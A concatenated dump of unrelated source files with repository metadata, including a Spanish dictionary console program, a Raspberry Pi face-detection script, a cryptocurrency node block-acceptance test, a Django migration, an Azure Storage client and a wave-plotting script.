| 2021-01-24T12:23:26.714885 | 2018-02-28T00:12:10 | 2018-02-28T00:12:10 | 123,134,359 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,110 |
py
|
# Creamos un diccionario
d = {}
# Mostrar menú
def menu() :
print("## MENÚ ##")
print("1) Añadir término")
print("2) Buscar definición")
print("0) Salir")
print("Que desea hacer:")
opcion = int(input())
return opcion;
# Mostramos la primera vez el menú
# y recogemos la opción seleccionada
op = menu()
# Ejecutamos hasta que queramos salir
while( op != 0 ):
# Ejecutamos la acción seleccionada
# Añadir
if( op == 1):
# Preguntamos por los datos del termino
print("Nombre del termino:")
termino = input()
print("Definición:")
definicion = input()
# Añadimos al diccionario
d[termino] = definicion
# Buscar
elif( op == 2):
# Preguntamos por el término
print("Nombre del termino:")
termino = input()
# Retornamos la Definición
print(d[termino])
else:
print("ERROR: Opción no reconocida");
# La acción ya se ha ejecutado
# Volvemos a mostrar el menú
op = menu()
# Cuando salgamos, mostramos todo el diccionario
print(d)
|
[
"[email protected]"
] | |
794d7b71c405e3df9b2868475614e966c73424c3
|
d6a752aefedf14439236017f2de98e5d40823f57
|
/bb2-07-05-face.py
|
b5cb5a5b17b2af28c03e731f69654c3e271a7e43
|
[] |
no_license
|
norihisayamada/opencv_bluebacks
|
918b243f178f4170f64a181e5d7dca262d6b85b4
|
df2cfadadc3f7a66eeb9784aa9427aa5cacd61b5
|
refs/heads/master
| 2022-11-12T02:10:09.345084 | 2020-07-10T03:02:36 | 2020-07-10T03:02:36 | 278,521,091 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,618 |
py
|
# -*- coding: utf-8 -*-
import picamera
import picamera.array
import cv2
cascade_path = "/usr/share/opencv/haarcascades/haarcascade_frontalface_alt.xml"
cascade = cv2.CascadeClassifier(cascade_path)
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as stream:
camera.resolution = (320, 240)
camera.framerate = 15
while True:
# stream.arrayにBGRの順で映像データを格納
camera.capture(stream, 'bgr', use_video_port=True)
# 映像データをグレースケール画像grayに変換
gray = cv2.cvtColor(stream.array, cv2.COLOR_BGR2GRAY)
# grayから顔を探す
facerect = cascade.detectMultiScale(gray, scaleFactor=1.3, minNeighbors=2, minSize=(30,30), maxSize=(150,150))
if len(facerect) > 0:
for rect in facerect:
# 元の画像(system.array)の顔がある位置赤い四角を描画
# rect[0:2]:長方形の左上の座標, rect[2:4]:長方形の横と高さ
# rect[0:2]+rect[2:4]:長方形の右下の座標
cv2.rectangle(stream.array, tuple(rect[0:2]),tuple(rect[0:2]+rect[2:4]), (0,0,255), thickness=2)
# system.arrayをウインドウに表示
cv2.imshow('frame', stream.array)
# "q"を入力でアプリケーション終了
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# streamをリセット
stream.seek(0)
stream.truncate()
cv2.destroyAllWindows()
|
[
"[email protected]"
] | |
d6b7f74c1a8958d8c0d2b441c408b1a559b1d5a0
|
1d21b7bc9205c9c2acd8b8fd8ee75dec93e974d4
|
/qa/rpc-tests/p2p-acceptblock.py
|
db03aff39949a8e3e99ec7b3f0a24f9f5da34678
|
[
"MIT"
] |
permissive
|
ZioFabry/LINC2
|
494d12be6034b7f5999960e3f3ed62f154be7ab8
|
a2e0e06cf68771a82bb1d4da30e0c914c8589bbe
|
refs/heads/master
| 2020-05-22T18:28:27.590171 | 2019-05-13T19:51:49 | 2019-05-13T19:51:49 | 186,471,965 | 0 | 0 |
MIT
| 2019-05-13T18:10:28 | 2019-05-13T18:10:27 | null |
UTF-8
|
Python
| false | false | 12,328 |
py
|
#!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
'''
AcceptBlockTest -- test processing of unrequested blocks.
Since behavior differs when receiving unrequested blocks from whitelisted peers
versus non-whitelisted peers, this tests the behavior of both (effectively two
separate tests running in parallel).
Setup: two nodes, node0 and node1, not connected to each other. Node0 does not
whitelist localhost, but node1 does. They will each be on their own chain for
this test.
We have one NodeConn connection to each, test_node and white_node respectively.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance.
3. Mine a block that forks the previous block, and deliver to each node from
corresponding peer.
Node0 should not process this block (just accept the header), because it is
unrequested and doesn't have more work than the tip.
Node1 should process because this is coming from a whitelisted peer.
4. Send another block that builds on the forking block.
Node0 should process this block but be stuck on the shorter chain, because
it's missing an intermediate block.
Node1 should reorg to this longer chain.
4b.Send 288 more blocks on the longer chain.
Node0 should process all but the last block (too far ahead in height).
Send all headers to Node1, and then send the last block in that chain.
Node1 should accept the block because it's coming from a whitelisted peer.
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
Node0 should figure out that Node0 has the missing height 2 block and send a
getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
def add_connection(self, conn):
self.connection = conn
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
while True:
with mininode_lock:
if self.verack_received:
return
time.sleep(0.05)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
self.connection.send_message(msg_ping(nonce=self.ping_counter))
received_pong = False
sleep_time = 0.05
while not received_pong and timeout > 0:
time.sleep(sleep_time)
timeout -= sleep_time
with mininode_lock:
if self.last_pong.nonce == self.ping_counter:
received_pong = True
self.ping_counter += 1
return received_pong
class AcceptBlockTest(BitcoinTestFramework):
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("LINCD", "lincd"),
help="bitcoind binary to test")
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
# Node0 will be used to test behavior of processing unrequested blocks
# from peers which are not whitelisted, while Node1 will be used for
# the whitelisted case.
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug"],
binary=self.options.testbinary))
self.nodes.append(start_node(1, self.options.tmpdir,
["-debug", "-whitelist=127.0.0.1"],
binary=self.options.testbinary))
def run_test(self):
# Setup the p2p connections and start up the network thread.
test_node = TestNode() # connects to node0 (not whitelisted)
white_node = TestNode() # connects to node1 (whitelisted)
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node))
connections.append(NodeConn('127.0.0.1', p2p_port(1), self.nodes[1], white_node))
test_node.add_connection(connections[0])
white_node.add_connection(connections[1])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
test_node.wait_for_verack()
white_node.wait_for_verack()
# 1. Have both nodes mine a block (leave IBD)
[ n.generate(1) for n in self.nodes ]
tips = [ int ("0x" + n.getbestblockhash() + "L", 0) for n in self.nodes ]
# 2. Send one block that builds on each tip.
# This should be accepted.
blocks_h2 = [] # the height 2 blocks on each node's chain
block_time = int(time.time()) + 1
for i in xrange(2):
blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
blocks_h2[i].solve()
block_time += 1
test_node.send_message(msg_block(blocks_h2[0]))
white_node.send_message(msg_block(blocks_h2[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
assert_equal(self.nodes[0].getblockcount(), 2)
assert_equal(self.nodes[1].getblockcount(), 2)
print "First height 2 block accepted by both nodes"
# 3. Send another block that builds on the original tip.
blocks_h2f = [] # Blocks at height 2 that fork off the main chain
for i in xrange(2):
blocks_h2f.append(create_block(tips[i], create_coinbase(2), blocks_h2[i].nTime+1))
blocks_h2f[i].solve()
test_node.send_message(msg_block(blocks_h2f[0]))
white_node.send_message(msg_block(blocks_h2f[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h2f[0].hash:
assert_equal(x['status'], "headers-only")
for x in self.nodes[1].getchaintips():
if x['hash'] == blocks_h2f[1].hash:
assert_equal(x['status'], "valid-headers")
print "Second height 2 block accepted only from whitelisted peer"
# 4. Now send another block that builds on the forking chain.
blocks_h3 = []
for i in xrange(2):
blocks_h3.append(create_block(blocks_h2f[i].sha256, create_coinbase(3), blocks_h2f[i].nTime+1))
blocks_h3[i].solve()
test_node.send_message(msg_block(blocks_h3[0]))
white_node.send_message(msg_block(blocks_h3[1]))
[ x.sync_with_ping() for x in [test_node, white_node] ]
# Since the earlier block was not processed by node0, the new block
# can't be fully validated.
for x in self.nodes[0].getchaintips():
if x['hash'] == blocks_h3[0].hash:
assert_equal(x['status'], "headers-only")
# But this block should be accepted by node0 since it has more work.
try:
self.nodes[0].getblock(blocks_h3[0].hash)
print "Unrequested more-work block accepted from non-whitelisted peer"
except:
raise AssertionError("Unrequested more work block was not processed")
# Node1 should have accepted and reorged.
assert_equal(self.nodes[1].getblockcount(), 3)
print "Successfully reorged to length 3 chain from whitelisted peer"
# 4b. Now mine 288 more blocks and deliver; all should be processed but
# the last (height-too-high) on node0. Node1 should process the tip if
# we give it the headers chain leading to the tip.
tips = blocks_h3
headers_message = msg_headers()
all_blocks = [] # node0's blocks
for j in xrange(2):
for i in xrange(288):
next_block = create_block(tips[j].sha256, create_coinbase(i + 4), tips[j].nTime+1)
next_block.solve()
if j==0:
test_node.send_message(msg_block(next_block))
all_blocks.append(next_block)
else:
headers_message.headers.append(CBlockHeader(next_block))
tips[j] = next_block
time.sleep(2)
for x in all_blocks:
try:
self.nodes[0].getblock(x.hash)
if x == all_blocks[287]:
raise AssertionError("Unrequested block too far-ahead should have been ignored")
except:
if x == all_blocks[287]:
print "Unrequested block too far-ahead not processed"
else:
raise AssertionError("Unrequested block with more work should have been accepted")
headers_message.headers.pop() # Ensure the last block is unrequested
white_node.send_message(headers_message) # Send headers leading to tip
white_node.send_message(msg_block(tips[1])) # Now deliver the tip
try:
white_node.sync_with_ping()
self.nodes[1].getblock(tips[1].hash)
print "Unrequested block far ahead of tip accepted from whitelisted peer"
except:
raise AssertionError("Unrequested block from whitelisted peer not accepted")
# 5. Test handling of unrequested block on the node that didn't process
# Should still not be processed (even though it has a child that has more
# work).
test_node.send_message(msg_block(blocks_h2f[0]))
# Here, if the sleep is too short, the test could falsely succeed (if the
# node hasn't processed the block by the time the sleep returns, and then
# the node processes it and incorrectly advances the tip).
# But this would be caught later on, when we verify that an inv triggers
# a getdata request for this block.
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
print "Unrequested block that would complete more-work chain was ignored"
# 6. Try to get node to request the missing block.
# Poke the node with an inv for block at height 3 and see if that
# triggers a getdata on block 2 (it should if block 2 is missing).
with mininode_lock:
# Clear state so we can check the getdata request
test_node.last_getdata = None
test_node.send_message(msg_inv([CInv(2, blocks_h3[0].sha256)]))
test_node.sync_with_ping()
with mininode_lock:
getdata = test_node.last_getdata
# Check that the getdata includes the right block
assert_equal(getdata.inv[0].hash, blocks_h2f[0].sha256)
print "Inv at tip triggered getdata for unprocessed block"
# 7. Send the missing block for the third time (now it is requested)
test_node.send_message(msg_block(blocks_h2f[0]))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 290)
print "Successfully reorged to longer chain from non-whitelisted peer"
[ c.disconnect_node() for c in connections ]
if __name__ == '__main__':
AcceptBlockTest().main()
|
[
"[email protected]"
] | |
7b677664e2d8c491d59f10a622c3e9d6b0b04b4f
|
65e94640b9838d627c0781cab4317858baadc914
|
/item/migrations/0001_initial.py
|
66445d68eb8afc07d45352a4ba0ad90a0d637ee0
|
[] |
no_license
|
Acc-Zidan/airbnb4
|
ccfc2a3b098f5906ef2c0187ac7ef89e98552af9
|
1e74f3b9a9b9aa7fb2ae1c055128d549067a4abc
|
refs/heads/main
| 2023-03-01T21:01:19.318547 | 2021-02-09T18:34:42 | 2021-02-09T18:34:42 | 328,228,669 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,710 |
py
|
# Generated by Django 3.1.5 on 2021-01-22 19:20
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
],
),
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('image', models.ImageField(upload_to='Item/')),
('price', models.IntegerField(default=0)),
('description', models.TextField(max_length=10000)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_category', to='item.category')),
],
),
migrations.CreateModel(
name='Place',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('image', models.ImageField(upload_to='place/')),
],
),
migrations.CreateModel(
name='ItemReview',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rate', models.IntegerField(default=0)),
('feedback', models.CharField(max_length=2000)),
('created_at', models.DateTimeField(default=django.utils.timezone.now)),
('auther', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_auther', to=settings.AUTH_USER_MODEL)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='review_item', to='item.item')),
],
),
migrations.CreateModel(
name='ItemImages',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(upload_to='ItemImages/')),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_images', to='item.item')),
],
),
migrations.CreateModel(
name='Itembook',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_from', models.DateField(default=django.utils.timezone.now)),
('date_to', models.DateField(default=django.utils.timezone.now)),
('qnty', models.IntegerField(default=1)),
('item', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='book_item', to='item.item')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='book_owner', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='item',
name='place',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='item_place', to='item.place'),
),
]
|
[
"[email protected]"
] | |
80fa29ace4588b9060f696b19bc728f82cbc9939
|
149b139871110353d5ec5a34cd99b2d9b03233e0
|
/backend/br/jus/tredf/analysis/backend/model/models.py
|
674f5f5e1615ce32588de17c4b92c3b40dda580e
|
[] |
no_license
|
alisonsilva/python
|
ca9a99700086d724605d286f05045b40713c9b07
|
de7b31e2279c081750e8ad13b04816e122ff253b
|
refs/heads/master
| 2020-03-07T19:14:17.802736 | 2018-04-26T13:47:05 | 2018-04-26T13:47:05 | 127,665,603 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,816 |
py
|
from datetime import datetime
from br.jus.tredf.analysis.backend.conf import db
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
posts = db.relationship('Post', backref='author', lazy='dynamic')
def __repr__(self):
return '<User {}>'.format(self.username)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post {}>'.format(self.body)
class IpAddress(db.Model):
id = db.Column(db.Integer, primary_key=True)
value = db.Column(db.String(20))
log_entries = db.relationship('LogEntry', backref='ip_address', lazy='select')
occurrences = db.relationship('Occurrence', backref='ip_address', lazy='select')
class LogEntry(db.Model):
id = db.Column(db.Integer, primary_key=True)
instant = db.Column(db.DateTime, index=True, default=datetime.utcnow)
request = db.Column(db.String(100))
status = db.Column(db.Integer)
user_agent = db.Column(db.String(255))
ip_addressid = db.Column(db.Integer, db.ForeignKey('ip_address.id'), nullable=False)
class Occurrence(db.Model):
id = db.Column(db.Integer, primary_key=True)
threshold = db.Column(db.Integer)
duration = db.Column(db.String(20))
start_date = db.Column(db.DateTime, default=datetime.utcnow)
comments = db.Column(db.String(255))
qtd_found = db.Column(db.Integer)
ip_addressid = db.Column(db.Integer, db.ForeignKey("ip_address.id"), nullable=False)
|
[
"[email protected]"
] | |
7b4c48f9072d0d8d3c8bdefc2ff22386e5ca805f
|
c68f8159b2f396d0718f71a1e0eb3fa31058b62f
|
/analytics/urls.py
|
a434fda5659c24a2cdfc3e1b3d2fa7a23578504a
|
[] |
no_license
|
hamideshoun/url_shortener
|
ed5c20018db385cf384cc4fcca691db7d025cdd0
|
27fb116d20662c349edfaa89dbc59a798819ff68
|
refs/heads/master
| 2023-06-14T12:54:07.283495 | 2021-07-08T00:50:18 | 2021-07-08T00:50:18 | 383,959,929 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 138 |
py
|
from django.urls import path
from analytics.views import ReportAPIView
urlpatterns = [
path('reports/', ReportAPIView.as_view()),
]
|
[
"[email protected]"
] | |
ee2c1cb101ed600ef6a59804bd8a60d49f33250a
|
531c47c15b97cbcb263ec86821d7f258c81c0aaf
|
/sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2019_06_01/aio/_storage_management_client_async.py
|
c4106bd382d3bd7e0ec92066dc1895978266f306
|
[
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later",
"MIT"
] |
permissive
|
YijunXieMS/azure-sdk-for-python
|
be364d3b88204fd3c7d223df23756386ff7a3361
|
f779de8e53dbec033f98f976284e6d9491fd60b3
|
refs/heads/master
| 2021-07-15T18:06:28.748507 | 2020-09-04T15:48:52 | 2020-09-04T15:48:52 | 205,457,088 | 1 | 2 |
MIT
| 2020-06-16T16:38:15 | 2019-08-30T21:08:55 |
Python
|
UTF-8
|
Python
| false | false | 8,245 |
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Optional, TYPE_CHECKING
from azure.mgmt.core import AsyncARMPipelineClient
from msrest import Deserializer, Serializer
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core.credentials_async import AsyncTokenCredential
from ._configuration_async import StorageManagementClientConfiguration
from .operations_async import Operations
from .operations_async import SkusOperations
from .operations_async import StorageAccountsOperations
from .operations_async import UsagesOperations
from .operations_async import ManagementPoliciesOperations
from .operations_async import PrivateEndpointConnectionsOperations
from .operations_async import PrivateLinkResourcesOperations
from .operations_async import ObjectReplicationPoliciesOperations
from .operations_async import EncryptionScopesOperations
from .operations_async import BlobServicesOperations
from .operations_async import BlobContainersOperations
from .operations_async import FileServicesOperations
from .operations_async import FileSharesOperations
from .operations_async import QueueServicesOperations
from .operations_async import QueueOperations
from .operations_async import TableServicesOperations
from .operations_async import TableOperations
from .. import models
class StorageManagementClient(object):
"""The Azure Storage Management API.
:ivar operations: Operations operations
:vartype operations: azure.mgmt.storage.v2019_06_01.aio.operations_async.Operations
:ivar skus: SkusOperations operations
:vartype skus: azure.mgmt.storage.v2019_06_01.aio.operations_async.SkusOperations
:ivar storage_accounts: StorageAccountsOperations operations
:vartype storage_accounts: azure.mgmt.storage.v2019_06_01.aio.operations_async.StorageAccountsOperations
:ivar usages: UsagesOperations operations
:vartype usages: azure.mgmt.storage.v2019_06_01.aio.operations_async.UsagesOperations
:ivar management_policies: ManagementPoliciesOperations operations
:vartype management_policies: azure.mgmt.storage.v2019_06_01.aio.operations_async.ManagementPoliciesOperations
:ivar private_endpoint_connections: PrivateEndpointConnectionsOperations operations
:vartype private_endpoint_connections: azure.mgmt.storage.v2019_06_01.aio.operations_async.PrivateEndpointConnectionsOperations
:ivar private_link_resources: PrivateLinkResourcesOperations operations
:vartype private_link_resources: azure.mgmt.storage.v2019_06_01.aio.operations_async.PrivateLinkResourcesOperations
:ivar object_replication_policies: ObjectReplicationPoliciesOperations operations
:vartype object_replication_policies: azure.mgmt.storage.v2019_06_01.aio.operations_async.ObjectReplicationPoliciesOperations
:ivar encryption_scopes: EncryptionScopesOperations operations
:vartype encryption_scopes: azure.mgmt.storage.v2019_06_01.aio.operations_async.EncryptionScopesOperations
:ivar blob_services: BlobServicesOperations operations
:vartype blob_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.BlobServicesOperations
:ivar blob_containers: BlobContainersOperations operations
:vartype blob_containers: azure.mgmt.storage.v2019_06_01.aio.operations_async.BlobContainersOperations
:ivar file_services: FileServicesOperations operations
:vartype file_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.FileServicesOperations
:ivar file_shares: FileSharesOperations operations
:vartype file_shares: azure.mgmt.storage.v2019_06_01.aio.operations_async.FileSharesOperations
:ivar queue_services: QueueServicesOperations operations
:vartype queue_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.QueueServicesOperations
:ivar queue: QueueOperations operations
:vartype queue: azure.mgmt.storage.v2019_06_01.aio.operations_async.QueueOperations
:ivar table_services: TableServicesOperations operations
:vartype table_services: azure.mgmt.storage.v2019_06_01.aio.operations_async.TableServicesOperations
:ivar table: TableOperations operations
:vartype table: azure.mgmt.storage.v2019_06_01.aio.operations_async.TableOperations
:param credential: Credential needed for the client to connect to Azure.
:type credential: ~azure.core.credentials_async.AsyncTokenCredential
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:param str base_url: Service URL
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
"""
def __init__(
self,
credential: "AsyncTokenCredential",
subscription_id: str,
base_url: Optional[str] = None,
**kwargs: Any
) -> None:
if not base_url:
base_url = 'https://management.azure.com'
self._config = StorageManagementClientConfiguration(credential, subscription_id, **kwargs)
self._client = AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
self.operations = Operations(
self._client, self._config, self._serialize, self._deserialize)
self.skus = SkusOperations(
self._client, self._config, self._serialize, self._deserialize)
self.storage_accounts = StorageAccountsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.usages = UsagesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.management_policies = ManagementPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_endpoint_connections = PrivateEndpointConnectionsOperations(
self._client, self._config, self._serialize, self._deserialize)
self.private_link_resources = PrivateLinkResourcesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.object_replication_policies = ObjectReplicationPoliciesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.encryption_scopes = EncryptionScopesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blob_services = BlobServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.blob_containers = BlobContainersOperations(
self._client, self._config, self._serialize, self._deserialize)
self.file_services = FileServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.file_shares = FileSharesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.queue_services = QueueServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.queue = QueueOperations(
self._client, self._config, self._serialize, self._deserialize)
self.table_services = TableServicesOperations(
self._client, self._config, self._serialize, self._deserialize)
self.table = TableOperations(
self._client, self._config, self._serialize, self._deserialize)
async def close(self) -> None:
await self._client.close()
async def __aenter__(self) -> "StorageManagementClient":
await self._client.__aenter__()
return self
async def __aexit__(self, *exc_details) -> None:
await self._client.__aexit__(*exc_details)
|
[
"[email protected]"
] | |
4a4d17d3ae6047f3dc96cac26f38a98d54b2c02c
|
ad32c2f9c37158540c6f221794a365b65bfbb02c
|
/lib/S02_onde_progressive.py
|
947b364f2de742fec5dfa689d3d8813b5634ee61
|
[] |
no_license
|
jjfPCSI1/py4phys
|
27bff9cd79e51b88dd926f552bda8c5d623585c0
|
47f9518d9b56e46a873bec9834c98c005a2c5017
|
refs/heads/master
| 2022-08-09T05:14:14.761789 | 2022-08-02T19:34:30 | 2022-08-02T19:34:30 | 22,642,385 | 27 | 18 | null | 2022-02-18T08:03:07 | 2014-08-05T12:21:56 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,016 |
py
|
# coding: utf8
# Sauf mention explicite du contraire par la suite, ce travail a été fait par
# Jean-Julien Fleck, professeur de physique/IPT en PCSI1 au lycée Kléber.
# Vous êtes libres de le réutiliser et de le modifier selon vos besoins.
'''
Illustration du phénomène de propagation vers la droite d'une onde de forme
quelconque à la fois au cours du temps dans un profil spatial, et spatialement
dans un profil temporel.
'''
import numpy as np # Pour np.linspace, np.exp et np.cos
import matplotlib.pyplot as plt # Pour les dessins
def f(u,k=10):
'''Le profil de l'onde à propager: une gaussienne multipliée par un cosinus.'''
return np.exp(-3*u**2) * np.cos(k*u-5)
nb_points = 1000 # Le nombre de points d'échantillonnage du graphe
nb_courbes = 3 # Le nombre de courbes à représenter
# Tout d'abord la visualisation spatiale
x = np.linspace(-2,2,nb_points) # Echantillonnage en position
t = np.linspace(0,5,nb_courbes) # On regarde le profil à différents temps
c = 0.2 # Vitesse de propagation de l'onde
for ti in t:
fi = f(x-c*ti) # Echantillonnage du profil pour les différents x
plt.plot(x,fi,label='$t={}$'.format(round(ti,1))) # Affichage
# La cosmétique
plt.title('Profil spatial pour differents temps')
plt.xlabel('Position $x$')
plt.ylabel("Profil de l'onde")
plt.legend()
plt.savefig('PNG/S02_onde_progressive_spatial.png')
plt.clf()
# Tout d'abord la visualisation spatiale
t = np.linspace(0,10,nb_points) # Echantillonnage en temps
x = np.linspace(0,0.6,nb_courbes) # On regarde le profil à différentes positions
c = 0.2 # Vitesse de propagation de l'onde
for xi in x:
fi = f(xi-c*t) # Echantillonnage du profil pour les différents t
plt.plot(t,fi,label='$x={}$'.format(round(xi,1))) # Affichage
# La cosmétique
plt.title('Profil temporel pour differente positions')
plt.xlabel('Temps $t$')
plt.ylabel("Profil de l'onde")
plt.legend()
plt.savefig('PNG/S02_onde_progressive_temporel.png')
plt.clf()
|
[
"[email protected]"
] | |
7acb737859a8d78bd545e2ef6489badd805c62d3
|
0aa3890c840528e517470207e06c1e7e136ecb43
|
/utils/__init__.py
|
524916b4a9d54c9df3eacaa805632b2aea82db06
|
[] |
no_license
|
solinari27/stockCrawler
|
7aa05cd8a7a18a6286b3bf9fd3512f4138b13951
|
4159e53cba2315b052cf37fddcbdb2dee8e9d094
|
refs/heads/master
| 2023-07-24T21:30:34.290533 | 2019-12-12T15:05:58 | 2019-12-12T15:05:58 | 120,918,787 | 0 | 0 | null | 2023-07-06T21:25:19 | 2018-02-09T14:58:31 |
Python
|
UTF-8
|
Python
| false | false | 119 |
py
|
#!usr/bin/env python
#-*- coding:utf-8 _*-
"""
@author: solinari
@file: __init__.py.py
@time: 2018/11/04
"""
|
[
"[email protected]"
] | |
c98bf9af78911012a5d580d8fab568dc0dd4d262
|
5aa0e5f32d529c3321c28d37b0a12a8cf69cfea8
|
/client/gui_lib/GUIElement.py
|
9e1b3576bea5c0ed0b0177d38d061da26e549710
|
[] |
no_license
|
sheepsy90/survive
|
26495f1ff2d8247fbb9470882f8be9f5272e7f2c
|
0eddf637be0eacd34415761b78fc2c9d50bc1528
|
refs/heads/master
| 2021-01-09T05:55:16.546762 | 2017-02-03T20:15:28 | 2017-02-03T20:15:28 | 80,864,391 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,463 |
py
|
import pygame
class GUIElement(object):
TEXT = 2
BUTTON = 1
def __init__(self, name, rect):
self.name = name
self.x, self.y, self.width, self.height = rect
self.is_hover = False
self.gui_handler = None
self.focus = False
self.visible = True
self.z_order = 0
self.titleFont = pygame.font.Font('resources/fonts/VENUSRIS.ttf', 64)
def set_zorder(self, order):
self.z_order = order
def get_zorder(self):
return self.z_order
def get_name(self):
return self.name
def set_hover_state(self, mx, my):
if self.x <= mx <= self.width+self.x and self.y <= my <= self.height+self.y:
self.is_hover = True
else:
self.is_hover = False
def update(self, mx, my, mouse_buttons, events):
self.set_hover_state(mx, my)
def get_rect(self):
return pygame.Rect(self.x, self.y, self.width, self.height)
def is_hover_active(self):
return self.is_hover
def draw(self, renderer):
raise NotImplementedError
def register_gui_handler(self, gui_handler):
self.gui_handler = gui_handler
def enable_focus(self):
self.focus = True
def disable_focus(self):
self.focus = False
def has_focus(self):
return self.focus
def set_visible(self, value):
self.visible = value
def is_visible(self):
return self.visible
|
[
"[email protected]"
] | |
45667c5a8f2316218249b7697d3dca26d9f8711e
|
ba8583b784301b2206d9cba3f57c4cc1c969165c
|
/src/data/prepare_dataset.py
|
bbf1df11477eddfd9cf35c8325d3ab688d32214b
|
[] |
no_license
|
tonylibing/tf_classification_framework
|
c8cd0c71badf6cd20a2e87711ebbe89f6f9eceba
|
e08f1b9dc7460a147a704ec099c64785663ce070
|
refs/heads/master
